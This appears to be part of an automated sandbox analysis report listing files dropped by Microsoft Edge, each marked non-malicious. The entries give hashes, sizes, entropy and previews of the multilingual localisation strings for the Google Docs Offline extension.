                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):978
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):907
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):937
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1337
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2846
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                  MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                  SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                  SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                  SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                  MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                  SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                  SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                  SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                  MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                  SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                  SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                  Encrypted:false
